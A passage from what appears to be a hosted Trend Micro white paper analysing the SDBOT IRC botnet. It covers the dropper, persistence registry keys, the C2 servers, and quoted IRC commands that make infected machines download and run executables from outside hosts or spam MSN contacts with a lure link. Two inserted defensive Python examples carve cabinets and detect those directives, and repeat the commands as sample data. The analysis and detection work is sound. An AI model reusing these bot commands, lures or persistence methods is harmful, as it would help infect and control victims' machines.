[Case Study ~ 2011] Baptist Hospitals of Southest Texas
[Case Study ~ 2011] Baptist Hospitals of Southest Texas[Case Study ~ 2011] Baptist Hospitals of Southest Texas
[Case Study ~ 2011] Baptist Hospitals of Southest TexasTrend Micro
 
Who owns security in the cloud
Who owns security in the cloudWho owns security in the cloud
Who owns security in the cloudTrend Micro
 
Encryption in the Public Cloud: 16 Bits of Advice for Security Techniques
Encryption in the Public Cloud: 16 Bits of Advice for Security TechniquesEncryption in the Public Cloud: 16 Bits of Advice for Security Techniques
Encryption in the Public Cloud: 16 Bits of Advice for Security TechniquesTrend Micro
 
Threat predictions 2011
Threat predictions 2011 Threat predictions 2011
Threat predictions 2011 Trend Micro
 
Trend micro deep security
Trend micro deep securityTrend micro deep security
Trend micro deep securityTrend Micro
 
Assuring regulatory compliance, ePHI protection, and secure healthcare delivery
Assuring regulatory compliance, ePHI protection, and secure healthcare deliveryAssuring regulatory compliance, ePHI protection, and secure healthcare delivery
Assuring regulatory compliance, ePHI protection, and secure healthcare deliveryTrend Micro
 
Solutions for privacy, disclosure and encryption
Solutions for privacy, disclosure and encryptionSolutions for privacy, disclosure and encryption
Solutions for privacy, disclosure and encryptionTrend Micro
 
Security Best Practices for Health Information Exchange
Security Best Practices for Health Information ExchangeSecurity Best Practices for Health Information Exchange
Security Best Practices for Health Information ExchangeTrend Micro
 
Solutions for PCI DSS Compliance
Solutions for PCI DSS ComplianceSolutions for PCI DSS Compliance
Solutions for PCI DSS ComplianceTrend Micro
 
PC Maker's Support Page Succumbs To Compromise
PC Maker's Support Page Succumbs To CompromisePC Maker's Support Page Succumbs To Compromise
PC Maker's Support Page Succumbs To CompromiseTrend Micro
 
Web Threat Spotlight Issue 66: Zero-Day Adobe Flash Player Exploits in a Flash
Web Threat Spotlight Issue 66:  Zero-Day Adobe Flash Player Exploits in a FlashWeb Threat Spotlight Issue 66:  Zero-Day Adobe Flash Player Exploits in a Flash
Web Threat Spotlight Issue 66: Zero-Day Adobe Flash Player Exploits in a FlashTrend Micro
 
FIFA Spam Targets Football Fanatics
FIFA Spam Targets Football FanaticsFIFA Spam Targets Football Fanatics
FIFA Spam Targets Football FanaticsTrend Micro
 
The Heart of KOOBFACE
The Heart of KOOBFACEThe Heart of KOOBFACE
The Heart of KOOBFACETrend Micro
 

Mais de Trend Micro (20)

Cybercrime In The Deep Web
Cybercrime In The Deep WebCybercrime In The Deep Web
Cybercrime In The Deep Web
 
AIS Exposed: New vulnerabilities and attacks. (HITB AMS 2014)
AIS Exposed: New vulnerabilities and attacks. (HITB AMS 2014)AIS Exposed: New vulnerabilities and attacks. (HITB AMS 2014)
AIS Exposed: New vulnerabilities and attacks. (HITB AMS 2014)
 
HBR APT framework
HBR APT frameworkHBR APT framework
HBR APT framework
 
Captain, Where Is Your Ship – Compromising Vessel Tracking Systems
Captain, Where Is Your Ship – Compromising Vessel Tracking SystemsCaptain, Where Is Your Ship – Compromising Vessel Tracking Systems
Captain, Where Is Your Ship – Compromising Vessel Tracking Systems
 
Countering the Advanced Persistent Threat Challenge with Deep Discovery
Countering the Advanced Persistent Threat Challenge with Deep DiscoveryCountering the Advanced Persistent Threat Challenge with Deep Discovery
Countering the Advanced Persistent Threat Challenge with Deep Discovery
 
The Custom Defense Against Targeted Attacks
The Custom Defense Against Targeted AttacksThe Custom Defense Against Targeted Attacks
The Custom Defense Against Targeted Attacks
 
Where to Store the Cloud Encryption Keys - InterOp 2012
Where to Store the Cloud Encryption Keys - InterOp 2012Where to Store the Cloud Encryption Keys - InterOp 2012
Where to Store the Cloud Encryption Keys - InterOp 2012
 
[Case Study ~ 2011] Baptist Hospitals of Southest Texas
[Case Study ~ 2011] Baptist Hospitals of Southest Texas[Case Study ~ 2011] Baptist Hospitals of Southest Texas
[Case Study ~ 2011] Baptist Hospitals of Southest Texas
 
Who owns security in the cloud
Who owns security in the cloudWho owns security in the cloud
Who owns security in the cloud
 
Encryption in the Public Cloud: 16 Bits of Advice for Security Techniques
Encryption in the Public Cloud: 16 Bits of Advice for Security TechniquesEncryption in the Public Cloud: 16 Bits of Advice for Security Techniques
Encryption in the Public Cloud: 16 Bits of Advice for Security Techniques
 
Threat predictions 2011
Threat predictions 2011 Threat predictions 2011
Threat predictions 2011
 
Trend micro deep security
Trend micro deep securityTrend micro deep security
Trend micro deep security
 
Assuring regulatory compliance, ePHI protection, and secure healthcare delivery
Assuring regulatory compliance, ePHI protection, and secure healthcare deliveryAssuring regulatory compliance, ePHI protection, and secure healthcare delivery
Assuring regulatory compliance, ePHI protection, and secure healthcare delivery
 
Solutions for privacy, disclosure and encryption
Solutions for privacy, disclosure and encryptionSolutions for privacy, disclosure and encryption
Solutions for privacy, disclosure and encryption
 
Security Best Practices for Health Information Exchange
Security Best Practices for Health Information ExchangeSecurity Best Practices for Health Information Exchange
Security Best Practices for Health Information Exchange
 
Solutions for PCI DSS Compliance
Solutions for PCI DSS ComplianceSolutions for PCI DSS Compliance
Solutions for PCI DSS Compliance
 
PC Maker's Support Page Succumbs To Compromise
PC Maker's Support Page Succumbs To CompromisePC Maker's Support Page Succumbs To Compromise
PC Maker's Support Page Succumbs To Compromise
 
Web Threat Spotlight Issue 66: Zero-Day Adobe Flash Player Exploits in a Flash
Web Threat Spotlight Issue 66:  Zero-Day Adobe Flash Player Exploits in a FlashWeb Threat Spotlight Issue 66:  Zero-Day Adobe Flash Player Exploits in a Flash
Web Threat Spotlight Issue 66: Zero-Day Adobe Flash Player Exploits in a Flash
 
FIFA Spam Targets Football Fanatics
FIFA Spam Targets Football FanaticsFIFA Spam Targets Football Fanatics
FIFA Spam Targets Football Fanatics
 
The Heart of KOOBFACE
The Heart of KOOBFACEThe Heart of KOOBFACE
The Heart of KOOBFACE
 

Último

Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxBkGupta21
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 

Último (20)

Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptx
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 

SDBOT IRC Botnet Continues To Make Waves

  • 1. SDBOT IRC Botnet Continues to Make Waves Trend Micro, Incorporated Loucif Kharouni Trend Micro Threat Research A Trend Micro White Paper I December 2009
• 2. SDBOT IRC Botnet Continues to Make Waves
CONTENTS
Overview (p. 3)
BKDR_SDBOT.COD Analysis (p. 4)
  Stage 1: Initial Installer (p. 4)
    TROJ_DROPPR.BH Details (p. 4)
    BKDR_SDBOT.COD Details (p. 5)
  Stage 2: IRC Communication (p. 6)
  Stage 3: Third-Party Malware (p. 7)
    TROJ_CUTWAIL (PUSHDO/PANDEX) (p. 8)
    TROJ_FAKEAV (p. 8)
    WORM_KOOBFACE (p. 8)
Social Engineering (p. 9)
  Spam Wave 1: Self-Promotion Spam (p. 9)
  Spam Wave 2: Prestige Replica Spam (p. 9)
  Spam Wave 3: Other Social Engineering Spam (p. 10)
Behind the Malware: Botnet Owners (p. 11)
SDBOT, the Pay-per-Install Model, and FAKEAV (p. 15)
Best Practices to Avoid SDBOT Malware Infection (p. 17)
Conclusion (p. 18)
References (p. 20)
2 WHITE PAPER I SDBOT IRC BOTNET CONTINUES TO MAKE WAVES
• 3. SDBOT IRC Botnet Continues to Make Waves
OVERVIEW
SDBOT malware variants usually propagate through network shares and by exploiting unpatched vulnerabilities. They also exhibit a number of backdoor capabilities and some information-theft routines. Some variants even have the capability to bypass security measures and to overwrite system files in order to maximize their network connection capacity.

SDBOT malware has been around since at least 2004. Most of the bots that communicate over the Internet Relay Chat (IRC) protocol, such as AGOBOT, IRCBOT, RBOT, and others, have been around since at least 2001. However, these kinds of malware rarely attract attention because they operate silently. These bots are neither heavy email spammers nor resource hogs. They hardly ever disrupt normal computer activities such as Internet browsing, so their victims never notice that their computers have been infected.

In this paper, the researcher focused on SDBOT variants and their final payload: the installation of pay-per-install programs.

The contents of this paper are targeted at security analysts and specialists. It includes an in-depth technical analysis of the SDBOT threat and takes a look behind the scenes at the business model used by the cybercriminal gang to rent out SDBOT's reach and download capability.
• 4. SDBOT IRC Botnet Continues to Make Waves
BKDR_SDBOT.COD ANALYSIS
Stage 1: Initial Installer
BKDR_SDBOT.COD is typically dropped by a Trojan detected by Trend Micro as TROJ_DROPPR.BH. It arrives as a file named photo.com that is actually a simple Win32 Cabinet Self-Extractor renamed to a .COM extension. The extension does not matter to Windows, which decides how to run a file from its MZ/PE header rather than from its name, so the self-extractor runs normally when the victim opens it. If the file is renamed back to an executable (by changing the extension to .EXE), the embedded file burim.exe can be extracted by running it.

TROJ_DROPPR.BH Details
Filename: photo.com
MD5: 613ceb085ee2ad31e1f95249d804409e
SHA-1: b73ae87c167c8ec0e9e52000d7d3d8e9ecaba27a

Here are some snippets from the Trojan's code. The Microsoft Cabinet file embedded in photo.com begins with the standard CAB signature 4D534346, which is the ASCII string "MSCF" (see Figure 1).
Figure 1. MSCF header [4D534346]
To extract the contents of the Cabinet file without running the dropper, the bytes from the MSCF signature onward were selected in a hex editor and saved as burim.cab (see Figure 2).
Figure 2. Extracting burim.cab from photo.com
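The manual carve described above (select everything from "MSCF" onward and save it as burim.cab) can be automated and made safer. The following Python is an added example, not code from the Trend Micro paper: it scans a host file for the MSCF signature, validates the CFHEADER so that a stray "MSCF" string is not mistaken for a cabinet, carves the cabinet using the length recorded in the header, hashes it, and lists the file names in its CFFILE table so the embedded burim.exe can be identified without ever executing the self-extractor. The sample blob, its payload and the decoy signature are constructed here; they are not the real photo.com, and the KNOWN_MD5 table only repeats the hashes the paper publishes.

```python
"""Carve Microsoft Cabinet (MSCF) archives out of a host file (added example)."""
import hashlib
import struct

MSCF_MAGIC = b"MSCF"                      # 4D 53 43 46 in hex, as in Figure 1
CFHEADER_FMT = "<4sIIIIIBBHHHHH"          # fixed part of CFHEADER (36 bytes)
CFHEADER_SIZE = struct.calcsize(CFHEADER_FMT)
CFFILE_FMT = "<IIHHHH"                    # CFFILE fixed part, then a NUL-terminated name

# Hashes the paper publishes for the real samples; used for comparison only.
KNOWN_MD5 = {
    "613ceb085ee2ad31e1f95249d804409e": "TROJ_DROPPR.BH (photo.com)",
    "2515df8f2df211e969da5d15d995da0e": "BKDR_SDBOT.COD (burim.exe / fxstaller.exe)",
}


def parse_cfheader(data: bytes, offset: int):
    """Return the CFHEADER fields found at `offset`, or None if it is not a sane cabinet."""
    if offset + CFHEADER_SIZE > len(data):
        return None
    (sig, _r1, cb_cabinet, _r2, coff_files, _r3, ver_minor, ver_major,
     c_folders, c_files, _flags, _set_id, _i_cabinet) = struct.unpack_from(CFHEADER_FMT, data, offset)
    # Reject decoys: wrong signature, unknown version, a size that runs past the
    # blob, a file table outside the cabinet, or no folders at all.
    if sig != MSCF_MAGIC or (ver_major, ver_minor) != (1, 3):
        return None
    if cb_cabinet < CFHEADER_SIZE or offset + cb_cabinet > len(data):
        return None
    if not (CFHEADER_SIZE <= coff_files < cb_cabinet) or c_folders == 0:
        return None
    return {"cbCabinet": cb_cabinet, "coffFiles": coff_files,
            "cFolders": c_folders, "cFiles": c_files}


def carve_cabinets(blob: bytes) -> list:
    """Find every valid cabinet embedded in `blob`; return offset, bytes and hashes of each."""
    found, pos = [], 0
    while True:
        pos = blob.find(MSCF_MAGIC, pos)
        if pos < 0:
            return found
        hdr = parse_cfheader(blob, pos)
        if hdr is None:          # "MSCF" bytes that are not a real header: keep scanning
            pos += 1
            continue
        cab = blob[pos:pos + hdr["cbCabinet"]]
        md5 = hashlib.md5(cab).hexdigest()
        found.append({"offset": pos, "size": len(cab), "data": cab, "md5": md5,
                      "sha1": hashlib.sha1(cab).hexdigest(),
                      "known_as": KNOWN_MD5.get(md5, "unknown")})
        pos += hdr["cbCabinet"]


def list_cab_files(cab: bytes) -> list:
    """Return [(name, uncompressed_size)] from the cabinet's CFFILE table."""
    hdr = parse_cfheader(cab, 0)
    if hdr is None:
        raise ValueError("not a cabinet")
    names, pos = [], hdr["coffFiles"]
    for _ in range(hdr["cFiles"]):
        cb_file = struct.unpack_from(CFFILE_FMT, cab, pos)[0]
        pos += struct.calcsize(CFFILE_FMT)
        end = cab.index(b"\x00", pos)           # szName is NUL-terminated
        names.append((cab[pos:end].decode("latin-1"), cb_file))
        pos = end + 1
    return names


def build_sample_cab(name: bytes, payload: bytes) -> bytes:
    """Constructed single-file, uncompressed cabinet used as test input (not burim.cab)."""
    cffile = struct.pack(CFFILE_FMT, len(payload), 0, 0, 0, 0, 0x20) + name + b"\x00"
    cfdata = struct.pack("<IHH", 0, len(payload), len(payload)) + payload
    coff_files = CFHEADER_SIZE + 8                      # one 8-byte CFFOLDER
    coff_data = coff_files + len(cffile)
    cb_cabinet = coff_data + len(cfdata)
    cffolder = struct.pack("<IHH", coff_data, 1, 0)     # 1 CFDATA block, tcompTYPE_NONE
    header = struct.pack(CFHEADER_FMT, MSCF_MAGIC, 0, cb_cabinet, 0, coff_files, 0,
                         3, 1, 1, 1, 0, 0x1234, 0)      # version 1.3, 1 folder, 1 file
    return header + cffolder + cffile + cfdata


# Constructed stand-in for photo.com: an MZ stub, a decoy "MSCF" string, then the cabinet.
SAMPLE_PAYLOAD = b"constructed test data standing in for burim.exe"
SAMPLE_CAB = build_sample_cab(b"burim.exe", SAMPLE_PAYLOAD)
SAMPLE_BLOB = b"MZ" + b"\x90" * 30 + b"MSCF" + b"\x00" * 40 + SAMPLE_CAB

if __name__ == "__main__":
    for cab in carve_cabinets(SAMPLE_BLOB):
        print(f"cabinet at offset {cab['offset']}, {cab['size']} bytes, md5 {cab['md5']} ({cab['known_as']})")
        for fname, size in list_cab_files(cab["data"]):
            print(f"  contains {fname} ({size} bytes)")
```

Run it as-is to see the constructed cabinet found at offset 76 and its single entry burim.exe; to use it on a real dropper, read the file into `SAMPLE_BLOB`'s place and compare the reported MD5 against the paper's values. The header checks are the point: a hex-editor carve that starts at the first "MSCF" string would have picked up the decoy.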
• 5. SDBOT IRC Botnet Continues to Make Waves
Figure 3. burim.exe extracted from burim.cab
The dropper (photo.com) performs some system changes. It creates the following registry entry:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 "C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP"
It also creates the following folder and files:
• C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP
• C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP\TMP4351$.TMP
• C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP\burim.exe
The IXP000.TMP folder and the advpack.dll,DelNodeRunDLL32 RunOnce entry are the normal footprint of a Microsoft IExpress self-extracting package: that entry only deletes the temporary extraction folder at the next logon and is not how the malware persists. The dropped file burim.exe is a backdoor.

BKDR_SDBOT.COD Details
Filename: burim.exe; fxstaller.exe
MD5: 2515df8f2df211e969da5d15d995da0e
SHA-1: a4f832556e9d4e8803b74ff40d7c0fd5b1fa8609

To infect systems, BKDR_SDBOT.COD places a copy of itself in the C:\Windows folder as fxstaller.exe and creates the following registry entry to ensure its automatic execution at every system startup:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows UDP Control Center = fxstaller.exe

Upon execution, BKDR_SDBOT.COD connects to the following IRC server:
dddd.burimche.net -> 89.255.10.90
IP address: 89.255.10.90
Host: unassigned-89-255-10-90.rdns.hosting-concepts.nl
Location: Rotterdam, Netherlands (NL)
Organization: Netnation Europe V.O.F.
ISP: Netnation Europe V.O.F.
AS number: AS15703 TrueServer BV
• 6. SDBOT IRC Botnet Continues to Make Waves
However, the IP address (89.255.10.90) may vary. During testing, the address the hostname resolved to changed every now and then to any of the following:
• 69.175.13.42
• 174.133.29.34
• 218.61.22.10
It then joins the IRC channel ##bb##. It also creates the mutex LiNbagGgsag to ensure that only one instance of itself is running in memory.

Stage 2: IRC Communication
Once back-and-forth communication has been established, the victim's computer effectively becomes a zombie. It can now be controlled via IRC by remote users, the operators of SDBOT. As the IRC traffic in Figure 4 shows, commands sent to the zombie instruct it to download third-party malware. This is part of the pay-per-install business.
Figure 4. IRC communication instructing the victim's computer to download files
:Bul-rdp!Bur-rdp@bur.gov TOPIC ##bb## :.p.karikar http://stashbox.org/543111/a.exe c:\tpde.exe 1
The machine then downloads the file a.exe from stashbox.org, saves it to the root of the C: drive as tpde.exe, and runs it; the trailing 1 is the flag that tells the bot to execute the file after downloading it. Note that the command is set as the channel topic, so every bot that joins ##bb## receives it on entry whether or not the operator is online at that moment. The same directive is also sent as an ordinary channel message:
:Bul-rdp!Bur-rdp@bur.gov PRIVMSG ##bb## :.p.karikar http://www.iliridas.com/girl.exe c:\tafe.exe 1
• 7. SDBOT IRC Botnet Continues to Make Waves
In the screenshot below (see Figure 5), the malware attempts to propagate via MSN Messenger, a popular instant messaging (IM) application.
Figure 5. Malware attempts to propagate via MSN
The bot master, the remote user who currently controls the network of compromised machines, sends the instruction via IRC, together with the link to spam to all of the MSN Messenger contacts found on the infected machine, using the following strings:
:get.lost 332 [NM00|FRA|79016] #!msn1! :!msn.stop| !msn.msg Hey, is this really you ?! : ) hxxp://www.main-gallery.com/image.php?=[msn email add of zombie machine]
Here 332 is the IRC RPL_TOPIC reply: the bot, using the nick [NM00|FRA|79016], is being handed the topic of channel #!msn1! on joining it, and the topic carries the !msn.msg directive with the message text and link. The link embeds the infected machine's own MSN address as a parameter, presumably so that the operators can tie each resulting click back to the machine that sent it. The message string above is then sent to all of the victim's MSN Messenger contacts. A contact who receives it will likely assume that the message came from a trusted contact. If he or she clicks the link, he or she is prompted to download and execute a file, which is the SDBOT malware.

Stage 3: Third-Party Malware
The victim's computer downloads any of several possible non-SDBOT malware listed below. Note, however, that this is not an exhaustive list.
• BKDR_POISON
• TROJ_BUZUS
• TROJ_CUTWAIL
• TROJ_FAKEAV
• TROJ_RENOS
• TROJ_SMALL
• TROJ_VUNDO
• WORM_AUTORUN
• WORM_KOOBFACE
• WORM_MAINBOT
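The two captures above (the .p.karikar download-and-execute directive in Stage 2 and the !msn.msg spreading directive in Figure 5) are both just text in the trailing part of an IRC message, which is what makes this C2 easy to detect on the wire. The following Python is an added example and not code from the paper or from the bot: it parses raw IRC lines into prefix, command, parameters and trailing text, then extracts the directives an SDBOT-style bot acts on from TOPIC, 332 (RPL_TOPIC) and PRIVMSG messages. The sample log is constructed from the lines the paper quotes; the victim address the paper redacts is replaced with the made-up victim@example.com, and the benign chatter and PING lines are invented to show what is ignored.

```python
"""Extract SDBOT-style bot directives from IRC traffic (added example)."""
import re
from dataclasses import dataclass


@dataclass
class IrcMessage:
    prefix: str      # sender, e.g. Bul-rdp!Bur-rdp@bur.gov
    command: str     # TOPIC, PRIVMSG, or a numeric such as 332 (RPL_TOPIC)
    params: list     # middle parameters (target nick, channel, ...)
    trailing: str    # text after " :", which is where the bot directives live


def parse_irc_line(line: str) -> IrcMessage:
    """Split one raw IRC line into prefix, command, params and trailing text."""
    line = line.rstrip("\r\n")
    prefix = ""
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    middle, sep, trailing = line.partition(" :")   # first " :" starts the trailing parameter
    parts = middle.split()
    return IrcMessage(prefix, parts[0] if parts else "", parts[1:], trailing if sep else "")


# ".p.karikar <url> <local path> <run flag>" is the download-and-execute directive
# from Figure 4; "!msn.msg <text with link>" and "!msn.stop" drive the MSN
# Messenger spreading from Figure 5. Both are matched on the trailing text only.
DOWNLOAD_EXEC = re.compile(r"\.p\.karikar\s+(\S+)\s+(\S+)\s+(\d)")
LINK = re.compile(r"\b(?:hxxp|http)s?://\S+")


def channel_of(msg: IrcMessage) -> str:
    """Channel a directive applies to; for 332 the params are <nick> <channel>."""
    if msg.command in ("TOPIC", "PRIVMSG"):
        return msg.params[0] if msg.params else ""
    if msg.command == "332":
        return msg.params[1] if len(msg.params) > 1 else ""
    return ""


def extract_bot_commands(msg: IrcMessage) -> list:
    """Return one finding per directive carried by a single IRC message."""
    channel = channel_of(msg)
    if not channel:                       # PING, JOIN, MOTD etc. carry no directives
        return []
    findings = []
    text = msg.trailing.strip()
    for m in DOWNLOAD_EXEC.finditer(text):
        findings.append({"kind": "download_execute", "channel": channel, "from": msg.prefix,
                         "url": m.group(1), "path": m.group(2), "execute": m.group(3) == "1"})
    for part in (p.strip() for p in text.split("|")):   # "!msn.stop| !msn.msg ..." chains with |
        if part.startswith("!msn.msg"):
            links = LINK.findall(part)
            findings.append({"kind": "msn_spread", "channel": channel, "from": msg.prefix,
                             "url": links[0] if links else "",
                             "message": part[len("!msn.msg"):].strip()})
        elif part.startswith("!msn.stop"):
            findings.append({"kind": "msn_stop", "channel": channel, "from": msg.prefix})
    return findings


def scan_log(lines) -> list:
    """Run the extractor over a capture; blank lines are skipped."""
    out = []
    for line in lines:
        if line.strip():
            out.extend(extract_bot_commands(parse_irc_line(line)))
    return out


# Constructed capture based on the lines quoted in the paper plus two benign lines.
SAMPLE_LOG = [
    ":Bul-rdp!Bur-rdp@bur.gov TOPIC ##bb## :.p.karikar http://stashbox.org/543111/a.exe c:\\tpde.exe 1",
    ":Bul-rdp!Bur-rdp@bur.gov PRIVMSG ##bb## :.p.karikar http://www.iliridas.com/girl.exe c:\\tafe.exe 1",
    ":get.lost 332 [NM00|FRA|79016] #!msn1! :!msn.stop| !msn.msg Hey, is this really you ?! : ) "
    "hxxp://www.main-gallery.com/image.php?=victim@example.com",
    ":someone!u@host PRIVMSG ##bb## :hello, anyone here?",   # invented benign chatter
    "PING :irc.example.net",                                 # invented server keepalive
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

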